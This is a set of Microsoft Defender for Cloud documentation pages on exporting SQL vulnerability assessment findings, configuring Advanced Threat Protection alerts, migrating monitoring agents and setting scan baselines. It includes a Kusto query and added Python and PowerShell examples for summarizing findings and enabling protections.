This article describes several ways to consume and export your scan results. 


Query and export findings in ARG with Defender for Cloud


To query and export your findings in ARG with Defender for Cloud:

1. Sign in to the Azure portal.
2. Navigate to Microsoft Defender for Cloud > Recommendations.
3. Search for and select either:

   • For Azure SQL databases - SQL databases should have vulnerability findings resolved.
   • For SQL on machines - SQL servers on machines should have vulnerability findings resolved.

4. Select Open Query.
5. Select either:

   • Query returning affected resources - Returns a list of the resources that are currently affected (recommendation status per resource).
   • Query returning security findings - Returns a list of all security findings (findings and subassessments aggregated per applicable resource).

6. Select Run query.
7. Select Download a CSV to export your results to a CSV file.


These queries are editable and can be customized to a specific resource, set of findings, 
findings status or more. 


Query and export findings in ARG 
To query and export your findings with ARG: 

1. Sign in to the Azure portal.

2. Navigate to Resource Graph Explorer. 


3. Edit and enter the following query: 


Kusto


securityresources
| where type =~ "microsoft.security/assessments/subassessments"
| extend assessmentKey=extract(@"(?i)providers/Microsoft.Security/assessments/([^/]*)", 1, id), subAssessmentId=tostring(properties.id), parentResourceId= extract("(.+)/providers/Microsoft.Security", 1, id)
| extend resourceIdTemp = iff(properties.resourceDetails.id != "", properties.resourceDetails.id, extract("(.+)/providers/Microsoft.Security", 1, id))
| extend resourceId = iff(properties.resourceDetails.source =~ "OnPremiseSql", strcat(resourceIdTemp, "/servers/", properties.resourceDetails.serverName, "/databases/" , properties.resourceDetails.databaseName), resourceIdTemp)
// Replace the placeholders with the resource ID of the database you want to export
| where resourceId =~ "/subscriptions/<subscriptionid>/resourcegroups/rgname/providers/microsoft.sql/servers/servername/databases/dbname"
| where assessmentKey =~ "82e20e14-edc5-4373-bfc4-f13121257c37"
| project resourceId,
    assessmentKey,
    subAssessmentId,
    name=properties.displayName,
    description=properties.description,
    severity=properties.status.severity,
    status=properties.status.code,
    cause=properties.status.cause,
    category=properties.category,
    impact=properties.impact,
    remediation=properties.remediation,
    benchmarks=properties.additionalData.benchmarks


4. Select Run query. 


5. Select Download a CSV, to export your results to a CSV file. 


[Screenshot: Azure Resource Graph Explorer running the query above, with results showing the columns resourceId, assessmentKey, subAssessmentId, name, description, severity, status, cause, category, impact, remediation and benchmarks.]


This query is editable and can be customized to a specific resource, set of findings, 
findings status or more. 
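Once the results are exported, the CSV can be processed outside the portal. The following is an added example, not Microsoft code: it parses a CSV with the columns the query above projects, counts failing (Unhealthy), passing (Healthy) and not-applicable checks per database, and lists the failed checks by severity. The rows are constructed sample data, not real scan results.

```python
"""Summarize a CSV exported from the Azure Resource Graph query above.

Added example, not Microsoft code. The columns are the ones the query
projects; the rows are constructed sample data, not real scan results.
"""
import csv
import io
from collections import Counter, defaultdict

SEVERITY_ORDER = {"High": 0, "Medium": 1, "Low": 2}

# Constructed sample: one database, five VA checks with made-up statuses.
RESOURCE_ID = ("/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/demo-rg"
               "/providers/Microsoft.Sql/servers/demosrv/databases/demodb")
ASSESSMENT_KEY = "82e20e14-edc5-4373-bfc4-f13121257c37"   # the key filtered in the query
COLUMNS = ["resourceId", "assessmentKey", "subAssessmentId", "name", "description",
           "severity", "status", "cause", "category", "impact", "remediation", "benchmarks"]
SAMPLE_ROWS = [
    # (rule id, display name, severity, status code, category) -- constructed values
    ("VA1219", "Transparent data encryption should be enabled", "High", "Healthy", "DataProtection"),
    ("VA1264", "Auditing of both successful and failed login attempts should be enabled",
     "Low", "Healthy", "AuditingAndLogging"),
    ("VA2108", "Minimal set of principals should be members of fixed high impact database roles",
     "High", "Unhealthy", "AuthenticationAndAuthorization"),
    ("VA2109", "Minimal set of principals should be members of fixed low impact database roles",
     "Low", "Unhealthy", "AuthenticationAndAuthorization"),
    ("VA1288", "Sensitive data columns should be classified", "Medium", "NotApplicable", "DataProtection"),
]


def build_sample_csv() -> str:
    """Write the constructed rows in the same shape as the 'Download a CSV' export."""
    buf = io.StringIO()
    writer = csv.writer(buf)
    writer.writerow(COLUMNS)
    for rule_id, name, severity, status, category in SAMPLE_ROWS:
        writer.writerow([RESOURCE_ID, ASSESSMENT_KEY, rule_id, name, "", severity, status,
                         "Unknown" if status == "Healthy" else "", category, "", "", "[]"])
    return buf.getvalue()


def load_findings(csv_text: str) -> list:
    """Parse the exported CSV into one dict per finding (sub-assessment)."""
    return list(csv.DictReader(io.StringIO(csv_text)))


def summarize(findings: list) -> dict:
    """Per resource: failing / passing / not-applicable counts and failing checks by severity.

    Sub-assessment status codes: Unhealthy = failed check, Healthy = passed check,
    NotApplicable = the rule does not apply to this database.
    """
    summary = defaultdict(lambda: {"failing": 0, "passing": 0, "not_applicable": 0,
                                   "failing_by_severity": Counter()})
    for f in findings:
        entry = summary[f["resourceId"]]
        if f["status"] == "Unhealthy":
            entry["failing"] += 1
            entry["failing_by_severity"][f["severity"]] += 1
        elif f["status"] == "Healthy":
            entry["passing"] += 1
        else:
            entry["not_applicable"] += 1
    return dict(summary)


def failing_checks(findings: list) -> list:
    """Failed checks, highest severity first, then by rule ID."""
    return sorted((f for f in findings if f["status"] == "Unhealthy"),
                  key=lambda f: (SEVERITY_ORDER.get(f["severity"], len(SEVERITY_ORDER)),
                                 f["subAssessmentId"]))


if __name__ == "__main__":
    rows = load_findings(build_sample_csv())
    for resource, s in summarize(rows).items():
        print(f"{resource.rsplit('/', 1)[-1]}: {s['failing']} failing, "
              f"{s['passing']} passing, {s['not_applicable']} not applicable")
    for f in failing_checks(rows):
        print(f"  [{f['severity']}] {f['subAssessmentId']} {f['name']}")
```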


Automate email notifications with LogicApps 


Azure Logic Apps is a low-code or no-code cloud-based service that provides you with a way to automate workflows and integrate data and services across different systems, both in the cloud and on-premises. You can use Logic Apps to automate the reporting of your vulnerability assessment findings across all supported versions of SQL, for example to send a weekly vulnerability report summary for all servers that were scanned. You can customize the Logic App to run on different schedules, such as daily, weekly or monthly, and to report on different scopes, such as per database, server or resource group.


You can use these instructions to learn how to use Logic Apps to automate email notifications using an example template.


This example Logic App template automates a weekly email report that summarizes the 
vulnerability scan results for every database from a selected list of servers. After you 
deploy the template, you must authorize the Office 365 connector to generate a valid 
access token to authenticate your credentials. 


The recipients will then receive emails with the findings of the scan results. 


Sample email for an Azure SQL server:


[Sample email: "A Vulnerability Assessment report is available for your server", with a scan results summary (databases scanned, total failing checks, total passing checks, risk summary by severity), a per-database table of failing and passing checks with View results links, and the subscription and resource details.]


Sample email for a SQL VM:


[Sample email: "A Vulnerability Assessment report is available for your machine 'sqlvm'", with the same scan results summary and per-database table. The footer notes that the emails are automated via an Azure Logic App.]

Other options 


You can use workflow automations to trigger actions based on changes to the recommendation's status.


You can also use the Vulnerability Assessments workbook to view an interactive report of your findings. The data from the workbook can be exported, and a copy of the workbook can be customized and stored. Learn how to create rich, interactive reports of Defender for Cloud data.


You can also enable Continuous export to stream alerts and recommendations as they're 
generated or to define a schedule to send periodic snapshots of all of the new data. 


Next steps 


Enable Microsoft Defender for SQL servers on machines 


SQL Advanced Threat Protection 


Article · 03/03/2023


Applies to: Azure SQL Database, Azure SQL Managed Instance, Azure Synapse Analytics, SQL Server on Azure VM, Azure Arc-enabled SQL Server


Advanced Threat Protection for Azure SQL Database, Azure SQL Managed Instance, 
Azure Synapse Analytics, SQL Server on Azure Virtual Machines and Azure Arc-enabled 
SQL Server detects anomalous activities indicating unusual and potentially harmful 
attempts to access or exploit databases. 


Advanced Threat Protection is part of the Microsoft Defender for SQL offering, which is 
a unified package for advanced SQL security capabilities. Advanced Threat Protection 
can be accessed and managed via the central Microsoft Defender for SQL portal. 


Overview 


Advanced Threat Protection provides a new layer of security, which enables customers to detect and respond to potential threats as they occur by providing security alerts on anomalous activities. Users receive an alert upon suspicious database activities, potential vulnerabilities, and SQL injection attacks, as well as anomalous database access and query patterns. Advanced Threat Protection integrates its alerts with Microsoft Defender for Cloud; each alert includes details of the suspicious activity and recommended actions on how to investigate and mitigate the threat. Advanced Threat Protection makes it simple to address potential threats to the database without the need to be a security expert or manage advanced security monitoring systems.


For a full investigation experience, it is recommended to enable auditing, which writes 
database events to an audit log in your Azure storage account. To enable auditing, see 
Auditing for Azure SQL Database and Azure Synapse or Auditing for Azure SQL 
Managed Instance. 


Alerts 


Advanced Threat Protection detects anomalous activities indicating unusual and 
potentially harmful attempts to access or exploit databases. For a list of alerts, see the 
Alerts for SQL Database and Azure Synapse Analytics in Microsoft Defender for Cloud. 


Explore detection of a suspicious event 


You receive an email notification upon detection of anomalous database activities. The email provides information on the suspicious security event including the nature of the anomalous activities, database name, server name, application name, and the event time. In addition, the email provides information on possible causes and recommended actions to investigate and mitigate the potential threat to the database.


[Screenshot: Advanced Threat Protection email notification for an Azure SQL Database alert. The alert reads "Potential exploitation of application code vulnerability to SQL Injection was detected. This may indicate a SQL Injection attack on database ...". The Activity details list Severity (High), Subscription ID and Name, Server, Database, IP address, Principal Name, Application (.Net SqlClient Data Provider), Date (May 13, 2018 12:09:12 UTC) and Threat ID, followed by Potential causes ("Defect in application code constructing SQL statements; application code doesn't sanitize user input and was exploited to inject malicious SQL statements."), Investigation steps ("View the vulnerable SQL statement") and Remediation steps ("Read more about SQL Injection threat and how to fix the vulnerable application code.").]

1. Click the View recent SQL alerts link in the email to launch the Azure portal and show the Microsoft Defender for Cloud alerts page, which provides an overview of active threats detected on the database.


2. Click a specific alert to get additional details and actions for investigating this 
threat and remediating future threats. 


For example, SQL injection is one of the most common Web application security 
issues on the Internet that is used to attack data-driven applications. Attackers take 
advantage of application vulnerabilities to inject malicious SQL statements into 
application entry fields, breaching or modifying data in the database. For SQL 
Injection alerts, the alert's details include the vulnerable SQL statement that was 
exploited. 


[Screenshot: Alert details pane in Microsoft Defender for Cloud. General information shows Description, Detection time (Sunday, 13 May 2018, 3:09:12 pm), Severity (High), State (Active), Attacked resource, Subscription, Detected by (Microsoft) and Action taken (Detected), followed by the investigation step "View the vulnerable SQL statement" and the remediation step "Read more about SQL Injection threat and how to fix the vulnerable application code."]


Explore alerts in the Azure portal 


Advanced Threat Protection integrates its alerts with Microsoft Defender for Cloud. Live SQL Advanced Threat Protection tiles within the database and SQL Microsoft Defender for Cloud blades in the Azure portal track the status of active threats.


Click Advanced Threat Protection alert to launch the Microsoft Defender for Cloud 
alerts page and get an overview of active SQL threats detected on the database. 


[Screenshot: Azure SQL Database overview blade in the Azure portal. Under Security the menu lists Auditing, Data Discovery & Classification, Dynamic Data Masking, Security Center and Transparent data encryption; the Notifications tile shows "Advanced Threat Protection alerts: There is 1 alert for this database. Click here to review." The Microsoft Defender for SQL blade shows Vulnerability Assessment (high, medium and low risk failures) and Advanced Threat Protection (high and medium severity alerts) tiles, a Security Alerts list with one entry ("Logon from an unusual l...", 9/5/2020) and the prompt "Turn on auditing for full investigation experience".]


Next steps 


• Learn more about Advanced Threat Protection in Azure SQL Database & Azure Synapse.
• Learn more about Advanced Threat Protection in Azure SQL Managed Instance.
• Learn more about Microsoft Defender for SQL.
• Learn more about Azure SQL Database auditing.
• Learn more about Microsoft Defender for Cloud.
• For more information on pricing, see the Azure SQL Database pricing page.


Configure Advanced Threat Protection 
for Azure SQL Database 


Article • 03/03/2023

Applies to: Azure SQL Database


Advanced Threat Protection for Azure SQL Database detects anomalous activities 
indicating unusual and potentially harmful attempts to access or exploit databases. 
Advanced Threat Protection can identify Potential SQL injection, Access from unusual 
location or data center, Access from unfamiliar principal or potentially harmful 
application, and Brute force SQL credentials - see more details in Advanced Threat 
Protection alerts. 


You can receive notifications about the detected threats via email notifications or the Azure portal.


Advanced Threat Protection is part of the Microsoft Defender for SQL offering, which is 
a unified package for advanced SQL security capabilities. Advanced Threat Protection 
can be accessed and managed via the central Microsoft Defender for SQL portal. 


Set up Advanced Threat Protection in the Azure 
portal 


1. Sign in to the Azure portal.


2. Navigate to the configuration page of the server you want to protect. In the 
security settings, select Microsoft Defender for Cloud. 


3. On the Microsoft Defender for Cloud configuration page: 


a. If Microsoft Defender for SQL hasn't yet been enabled, select Enable Microsoft 
Defender for SQL. 


b. Select Configure. 


[Screenshot: Microsoft Defender for Cloud page of a SQL server (chrisqpublictest) in the Azure portal. The Security menu lists Auditing, Microsoft Defender for SQL, Firewalls and virtual networks, Private endpoint connections, Microsoft Defender for Cloud, Transparent data encryption and Identity. The page shows Recommendations, Security alerts and Findings counters, "Microsoft Defender for SQL: Disabled (Configure)", a 30-day free trial notice ("After the trial ends, you will be charged $15/Server/Month") and the Enable Microsoft Defender for SQL button.]


c. Under ADVANCED THREAT PROTECTION SETTINGS, select Add your contact 
details to the subscription's email settings in Defender for Cloud. 


[Screenshot: Server settings page for chrisqpublictest. VULNERABILITY ASSESSMENT SETTINGS: Subscription, Storage account, Periodic recurring scans (ON/OFF), Send scan reports to, Also send email notification to admins and subscription owners. ADVANCED THREAT PROTECTION SETTINGS: "Advanced Threat Protection for SQL alerts emails are sent by Defender for Cloud. Add your contact details to the subscription's email settings in Defender for Cloud." and the prompt "Enable Auditing for better threats investigation experience".]


d. Provide the list of emails to receive notifications upon detection of anomalous database activities in the Additional email addresses (separated by commas) text box.


e. Optionally customize the severity of alerts that will trigger notifications to be 
sent under Notification types. 


f. Select Save. 


[Screenshot: Email notifications page in Defender for Cloud for the Contoso Team subscription. Email recipients: "All users with the following roles" (Owner) and "Additional email addresses (separated by commas)". Notification types: "Notify about alerts with the following severity (or higher)" set to High, with the note "You'll receive a maximum of one email per 6 hours for high-severity alerts, one email per 12 hours for medium-severity alerts, and one email per 24 hours for low-severity alerts."]


Set up Advanced Threat Protection using 
PowerShell 


For a script example, see Configure auditing and Advanced Threat Protection using 
PowerShell. 
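An added example of the PowerShell route, not the script from the linked article: it enables the Defender for SQL plan on the subscription, turns on Advanced Threat Protection and auditing for one logical server, and registers the security contact that Defender for Cloud sends alert emails to. Subscription, resource group, server, storage account and email values are placeholders; the cmdlets are from the Az.Security, Az.Sql and Az.Storage modules, with parameter names as published for those modules (confirm with Get-Help for your installed version).

```powershell
#Requires -Modules Az.Accounts, Az.Security, Az.Sql, Az.Storage
<#
 Added example (not the script from the linked Microsoft article). Enables Microsoft
 Defender for SQL on a subscription, turns on Advanced Threat Protection and auditing
 for one logical server, and sets the security contact that receives alert emails.
 All names below are placeholders; cmdlet and parameter names are those published for
 the Az.Security, Az.Sql and Az.Storage modules (confirm with Get-Help for your version).
#>
param(
    [Parameter(Mandatory)] [string] $SubscriptionId,          # placeholder
    [Parameter(Mandatory)] [string] $ResourceGroupName,       # placeholder, e.g. rg-sql-prod
    [Parameter(Mandatory)] [string] $ServerName,              # placeholder logical server name
    [Parameter(Mandatory)] [string] $AuditStorageAccountName, # placeholder, audit log target
    [string] $AlertEmail = 'secops@contoso.example'           # constructed recipient
)

Set-AzContext -SubscriptionId $SubscriptionId | Out-Null

# 1. Defender for SQL plan for Azure SQL resources: 'Standard' is the Defender tier,
#    'Free' turns the plan off.
Set-AzSecurityPricing -Name 'SqlServers' -PricingTier 'Standard' | Out-Null

# 2. Advanced Threat Protection on the server (this also provisions vulnerability assessment).
Enable-AzSqlServerAdvancedDataSecurity -ResourceGroupName $ResourceGroupName -ServerName $ServerName | Out-Null

# 3. Auditing to a storage account, which the article recommends for a full investigation
#    experience; 90 days of retention keeps enough history to follow up an alert.
$storage = Get-AzStorageAccount -ResourceGroupName $ResourceGroupName -Name $AuditStorageAccountName
Set-AzSqlServerAudit -ResourceGroupName $ResourceGroupName -ServerName $ServerName `
    -BlobStorageTargetState Enabled -StorageAccountResourceId $storage.Id -RetentionInDays 90

# 4. Alert emails are sent by Defender for Cloud to the subscription's security contact,
#    not by the SQL server; -NotifyOnAlert enables the emails, -AlertAdmin adds subscription admins.
Set-AzSecurityContact -Name 'default1' -Email $AlertEmail -AlertAdmin -NotifyOnAlert | Out-Null

# 5. Report the resulting state so a runbook or pipeline can verify it.
[pscustomobject]@{
    DefenderForSqlTier = (Get-AzSecurityPricing -Name 'SqlServers').PricingTier
    ThreatProtection   = Get-AzSqlServerAdvancedThreatProtectionSetting -ResourceGroupName $ResourceGroupName -ServerName $ServerName
    AuditTargetState   = (Get-AzSqlServerAudit -ResourceGroupName $ResourceGroupName -ServerName $ServerName).BlobStorageTargetState
}
```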


Next steps 


Learn more about Advanced Threat Protection and Microsoft Defender for SQL in the 
following articles: 


• Advanced Threat Protection
• Advanced Threat Protection in SQL Managed Instance
• Microsoft Defender for SQL
• Auditing for Azure SQL Database and Azure Synapse Analytics
• Microsoft Defender for Cloud
• For more information on pricing, see the SQL Database pricing page


Enable Microsoft Defender for SQL 
servers on machines 
Defender for SQL protects your IaaS SQL Servers by identifying and mitigating potential database vulnerabilities and detecting anomalous activities that could indicate threats to your databases.


Defender for Cloud raises alerts when it detects suspicious database activities, potentially harmful attempts to access or exploit SQL machines, SQL injection attacks, and anomalous database access and query patterns. The alerts created by these types of events appear on the alerts reference page.


Defender for Cloud uses vulnerability assessment to discover, track, and assist you in the 
remediation of potential database vulnerabilities. Assessment scans provide an overview 
of your SQL machines’ security state and provide details of any security findings. 


Learn more about vulnerability assessment for Azure SQL servers on machines. 


Defender for SQL servers on machines protects your SQL servers hosted in Azure, multicloud, and even on-premises machines.

• Learn more about SQL Server on Virtual Machines.

• For on-premises SQL servers, you can learn more about Azure Arc-enabled SQL Server and how to install Log Analytics agent on Windows computers without Azure Arc.

• For multicloud SQL servers:
   ◦ Connect your AWS accounts to Microsoft Defender for Cloud
   ◦ Connect your GCP project to Microsoft Defender for Cloud


Note


You must enable database protection for your multicloud SQL servers 
through the AWS connector or the GCP connector. 


Availability 


Aspect                    Details
Release state:            General availability (GA)
Pricing:                  Microsoft Defender for SQL servers on machines is billed as shown on the pricing page
Protected SQL versions:   SQL Server version: 2012, 2014, 2016, 2017, 2019, 2022
                          - SQL on Azure virtual machines
                          - SQL Server on Azure Arc-enabled servers
                          - On-premises SQL servers on Windows machines without Azure Arc
Clouds:                   Commercial clouds
                          Azure Government
                          Microsoft Azure operated by 21Vianet (Advanced Threat Protection Only)


Set up Microsoft Defender for SQL servers on 
machines 


The Defender for SQL servers on machines plan requires either the Microsoft Monitoring Agent (MMA) or Azure Monitoring Agent (AMA) to prevent attacks and detect misconfigurations. The plan's autoprovisioning process is automatically enabled with the plan and is responsible for the configuration of all of the agent components required for the plan to function. This includes installation and configuration of MMA/AMA, workspace configuration, and the installation of the plan's VM extension/solution.


Microsoft Monitoring Agent (MMA) is set to be retired in August 2024. Defender for Cloud updated its strategy accordingly by releasing a SQL Server-targeted Azure Monitoring Agent (AMA) autoprovisioning process to replace the Microsoft Monitoring Agent (MMA) process, which is set to be deprecated. Learn more about the AMA for SQL server on machines (Preview) autoprovisioning process and how to migrate to it.


Note


During the Azure Monitoring Agent for SQL Server on machines (Preview), 
customers who are currently using the Log Analytics agent/Azure Monitor agent 
processes will be asked to migrate to the AMA for SQL server on machines 
(Preview) autoprovisioning process. 


To enable the plan: 


1. Sign in to the Azure portal.


2. Search for and select Microsoft Defender for Cloud. 
3. In the Defender for Cloud menu, select Environment settings. 
4. Select the relevant subscription. 


5. On the Defender plans page, locate the Databases plan and select Select types. 




6. In the Resource types selection window, toggle the SQL servers on machines plan 
to On. 


7. Select Continue. 

8. Select Save. 

9. (Optional) Configure advanced autoprovisioning settings: 
a. Navigate to the Environment settings page. 
b. Select Settings & monitoring. 


   • For customers using the current generally available autoprovisioning process, select Edit configuration for the Log Analytics agent/Azure Monitor agent component.

   • For customers using the preview of the autoprovisioning process, select Edit configuration for the Azure Monitoring Agent for SQL server on machines (Preview) component.


Explore and investigate security alerts 


There are several ways to view Microsoft Defender for SQL alerts in Microsoft Defender 
for Cloud: 


• The Alerts page.
• The machine's security page.
• The workload protections dashboard.
• Through the direct link provided in the alert's email.

To view alerts:

1. Sign in to the Azure portal.
2. Search for and select Microsoft Defender for Cloud.
3. Select Security alerts.
4. Select an alert.


Alerts are designed to be self-contained, with detailed remediation steps and 
investigation information in each one. You can investigate further by using other 
Microsoft Defender for Cloud and Microsoft Sentinel capabilities for a broader view: 


• Enable SQL Server's auditing feature for further investigations. If you're a Microsoft Sentinel user, you can upload the SQL auditing logs from the Windows Security Log events to Sentinel and enjoy a rich investigation experience. Learn more about SQL Server Auditing.

• To improve your security posture, use Defender for Cloud's recommendations for the host machine indicated in each alert to reduce the risks of future attacks.


Learn more about managing and responding to alerts. 


Next steps 
For related information, see these resources: 


• How Microsoft Defender for Azure SQL can protect SQL servers anywhere.
• Security alerts for SQL Database and Azure Synapse Analytics
• Set up email notifications for security alerts
• Learn more about Microsoft Sentinel
• Check out common questions about Defender for Databases.


Migrate to SQL server-targeted Azure 
Monitoring Agent's (AMA) 
autoprovisioning process (Preview) 
Microsoft Monitoring Agent (MMA) is being deprecated in August 2024. As a result, a new SQL server-targeted Azure Monitoring Agent (AMA) autoprovisioning process is being released in preview. You can learn more about the Defender for SQL Server on machines Log Analytics Agent's deprecation plan.


During the preview, customers who are using the current autoprovisioning process with 
Azure Monitor Agent (Preview) option, should migrate to the new Azure Monitoring 
Agent for SQL server on machines (Preview) autoprovisioning process. The migration 
process is seamless and provides continuous protection for all machines. 


Migrate to the SQL server-targeted AMA 
autoprovisioning process 


1. Sign in to the Azure portal.

2. Search for and select Microsoft Defender for Cloud.

3. In the Defender for Cloud menu, select Environment settings.

4. Select the relevant subscription.

5. Under the Databases plan, select Action required.


[Screenshot: Environment settings > Settings | Defender plans page, Cloud Workload Protection (CWP) section, showing resource quantity and monitoring coverage per plan, with the Action required button on the Databases plan.]

Note


If you do not see the action required button, under the Databases plan select 
Settings and then toggle the Azure Monitoring Agent for SQL server on 
machines (Preview) option to On. Then select Continue > Save. 


6. In the pop-up window, select Enable.

[Screenshot: "Update the SQL servers on machines plan agent autoprovisioning settings" pop-up: "Defender for SQL server on machines plan is migrating to a SQL-targeted Azure Monitoring Agent autoprovisioning process. Enable the new process to continue protecting your SQL VMs and Arc-enabled SQL Servers."]

7. Select Save.

Once the SQL server-targeted AMA autoprovisioning process has been enabled, you should disable the Log Analytics agent/Azure Monitor agent autoprovisioning process.

Note


If you have the Defender for Server plan enabled, you will need to review the 
Defender for Servers Log Analytics deprecation plan for Log Analytics 
agent/Azure Monitor agent dependency before disabling the process. 


Disable the Log Analytics agent/Azure Monitor 
agent 

1. Sign in to the Azure portal.

2. Search for and select Microsoft Defender for Cloud. 

3. In the Defender for Cloud menu, select Environment settings. 

4. Select the relevant subscription. 

5. Under the Database plan, select Settings. 


6. Toggle the Log Analytics agent/Azure Monitor agent to Off.

[Screenshot: Settings & monitoring page with the Log Analytics agent/Azure Monitor agent component toggled to Off.]


7. Select Continue. 


8. Select Save. 


Next steps 


For related information, see these resources: 


• How Microsoft Defender for Azure SQL can protect SQL servers anywhere.
• Security alerts for SQL Database and Azure Synapse Analytics
• Set up email notifications for security alerts
• Learn more about Microsoft Sentinel
• Check out common questions about Defender for Databases.


Scan your SQL servers for vulnerabilities 


Article • 05/10/2023


Microsoft Defender for SQL servers on machines extends the protections for your Azure-native SQL Servers to fully support hybrid environments and protect SQL servers (all supported versions) hosted in Azure, other cloud environments, and even on-premises machines:

• SQL Server on Virtual Machines
• On-premises SQL servers:
   ◦ SQL Server on Azure Arc-enabled servers
   ◦ SQL Server running on Windows machines without Azure Arc


The integrated vulnerability assessment scanner discovers, tracks, and helps you remediate potential database vulnerabilities. Assessment scan findings provide an overview of your SQL machines' security state and details of any security findings.


Note


The scan is lightweight, safe, only takes a few seconds per database to run and is 
entirely read-only. It does not make any changes to your database. 


Explore vulnerability assessment reports 


The vulnerability assessment service scans your databases every 12 hours. 


The vulnerability assessment dashboard provides an overview of your assessment results 
across all your databases, along with a summary of healthy and unhealthy databases, 
and an overall summary of failing checks according to risk distribution. 


You can view the vulnerability assessment results directly from Defender for Cloud.

1. From Defender for Cloud's sidebar, open the Recommendations page.

2. Select the recommendation SQL servers on machines should have vulnerability findings resolved. For more information, see the Defender for Cloud recommendations reference page.


[Screenshot: Microsoft Defender for Cloud | Recommendations page, filtered on "sql" and grouped by controls. It shows the Secure Score (60%, ~36 of 60 points), recommendations status and resource health (healthy, unhealthy, not applicable), and under the Remediate vulnerabilities control the recommendations "Advanced data security should be enabled on your SQL servers", "Vulnerability assessment should be enabled on your SQL servers", "Vulnerability assessment should be enabled on your SQL managed instances", "Vulnerability Assessment findings on your SQL databases should be remediated" and the SQL servers on machines recommendation, each with its count of unhealthy resources.]

The detailed view for this recommendation appears.

[Screenshot: Detailed view of "Vulnerability assessment findings on your SQL servers on machines should be remediated", with Exempt, Disable rule and View policy definition actions, Description and Affected resources sections, and a Security Checks table (Findings, Passed, Disabled findings tabs) listing each check's ID, Security Check, Category, Applies To, Benchmark and Severity, for example VA2110 "Execute permissions to access the registry should be restricted" (Authentication And Authorization, FedRAMP, High) and VA1059 "xp_cmdshell should be disabled" (Surface Area Reduction, CIS, FedRAMP, High).]


3. For more details, drill down:

   • For an overview of scanned resources (databases) and the list of security checks that were tested, open the Affected resources and select the server of interest.

   • For an overview of the vulnerabilities grouped by a specific SQL database, select the database of interest.


In each view, the security checks are sorted by Severity. Select a specific security 
check to see a details pane with a Description, how to Remediate it, and other 
related information such as Impact or Benchmark. 


Set a baseline 


As you review your assessment results, you can mark results as being an acceptable 
baseline in your environment. The baseline is essentially a customization of how the 
results are reported. Results that match the baseline are considered as passing in 
subsequent scans. After you've established your baseline security state, the vulnerability 
assessment scanner only reports on deviations from the baseline. In this way, you can 
focus your attention on the relevant issues. 
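An added example, not code from the article, of driving the same baseline workflow with the Az.Security cmdlets listed under "Manage vulnerability assessments programmatically" below: it reads the latest scan of one database on a SQL server on machines, lists its failing checks by severity, and adds reviewed rules to the baseline so later scans report them as passing. The database resource id and workspace id are placeholders, and the parameter and property names (ResourceId, WorkspaceId, ScanId, RuleId, LatestScan, Status, RuleMetadata, EndTime) are assumed from the SQL vulnerability assessment REST API shape; check them against Get-Help for your module version.

```powershell
#Requires -Modules Az.Accounts, Az.Security
<#
 Added example (not from the Microsoft article). Lists the failing checks of the latest
 vulnerability assessment scan of one database on a SQL server on machines, then adds
 reviewed rules to the baseline so that later scans report them as passing.
 ASSUMPTIONS: -ResourceId/-WorkspaceId/-ScanId/-RuleId/-LatestScan and the Status,
 RuleMetadata, ScanId and EndTime properties follow the SQL vulnerability assessment
 REST API; confirm with Get-Help <cmdlet> -Full for the installed Az.Security version.
#>
param(
    # Placeholder: ARM id of the scanned database (the provider path differs between
    # Azure VM and Azure Arc-enabled hosts).
    [Parameter(Mandatory)] [string] $DatabaseResourceId,
    # Placeholder: workspace id (GUID) of the Log Analytics workspace holding the scan data.
    [Parameter(Mandatory)] [string] $WorkspaceId,
    # Rule ids (for example VA1258) that were reviewed and accepted as the baseline.
    [string[]] $AcceptAsBaseline = @()
)

# Sort order used by the portal: High first, then Medium, then Low.
$severityRank = @{ High = 0; Medium = 1; Low = 2 }

# 1. Most recent scan record of this database.
$latest = Get-AzSecuritySqlVulnerabilityAssessmentScanRecord `
              -ResourceId $DatabaseResourceId -WorkspaceId $WorkspaceId |
          Sort-Object EndTime -Descending | Select-Object -First 1
if (-not $latest) { throw "No vulnerability assessment scan found for $DatabaseResourceId" }

# 2. Per-rule results of that scan; 'Finding' marks a failed check, 'NonFinding' a pass.
$findings = Get-AzSecuritySqlVulnerabilityAssessmentScanResult `
                -ResourceId $DatabaseResourceId -WorkspaceId $WorkspaceId -ScanId $latest.ScanId |
            Where-Object { $_.Status -eq 'Finding' } |
            Sort-Object @{ Expression = {
                $sev = $_.RuleMetadata.Severity
                if ($severityRank.ContainsKey($sev)) { $severityRank[$sev] } else { 9 } } }, RuleId

Write-Host ("Scan {0}: {1} failing check(s)" -f $latest.ScanId, @($findings).Count)
$findings | Select-Object RuleId,
    @{ n = 'Severity'; e = { $_.RuleMetadata.Severity } },
    @{ n = 'Category'; e = { $_.RuleMetadata.Category } },
    @{ n = 'Check';    e = { $_.RuleMetadata.Title } } |
    Format-Table -AutoSize

# 3. Baseline only rules that were requested AND are failing in this scan; the latest
#    scan's query results become the accepted state for each rule.
foreach ($ruleId in $AcceptAsBaseline) {
    if (@($findings).RuleId -notcontains $ruleId) {
        Write-Warning "$ruleId is not a failing check in scan $($latest.ScanId); skipping"
        continue
    }
    Add-AzSecuritySqlVulnerabilityAssessmentBaseline `
        -ResourceId $DatabaseResourceId -WorkspaceId $WorkspaceId -RuleId $ruleId -LatestScan | Out-Null
    Write-Host "Baseline set for $ruleId; it reports as passing in subsequent scans"
}
```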


[Screenshot: Details pane for finding VA2110, "Execute permissions to access the registry should be restricted", on the master database of an Arc-enabled server. Severity High, Status Unhealthy, Scan time 12/2/2020. Remediation: review the list of principals that have permission to execute registry extended stored procedures, revoke execute permissions from principals that do not need them, and add the remaining principals as a baseline so that changes to the list are tracked; revoking can affect applications that use the SMO library, such as SSMS. The Description explains that registry extended stored procedures let SQL Server read, write and enumerate registry values and keys; the Impact section notes that the registry contains sensitive information such as password hashes and clear text passwords, that LocalSystem can read and write nearly all of it, and that, unlike xp_cmdshell, the registry extended stored procedures always execute under the security context of the MSSQLServer service, so access to them must be guarded. The Query and results section shows the check's T-SQL (a SELECT over sys.database_permissions joined to sys.database_principals, filtered to the xp_reg* extended stored procedures) and a remediation script of REVOKE EXECUTE statements, with the warning "Exercise standard precautions when using the suggested remediation script on production environments". Benchmark: FedRAMP. Buttons: Add all results as baseline, Remove all from baseline.]


Export results 


Use the Continuous export feature of Microsoft Defender for Cloud to export 
vulnerability assessment findings to Azure Event Hubs or to Log Analytics workspace. 


View vulnerabilities in graphical, interactive 
reports 


Defender for Cloud's integrated Azure Monitor Workbooks gallery includes an interactive report of all findings from the vulnerability scanners for machines, containers in container registries, and SQL servers.


Findings for each of these scanners are reported in separate recommendations: 


• Machines should have vulnerability findings resolved
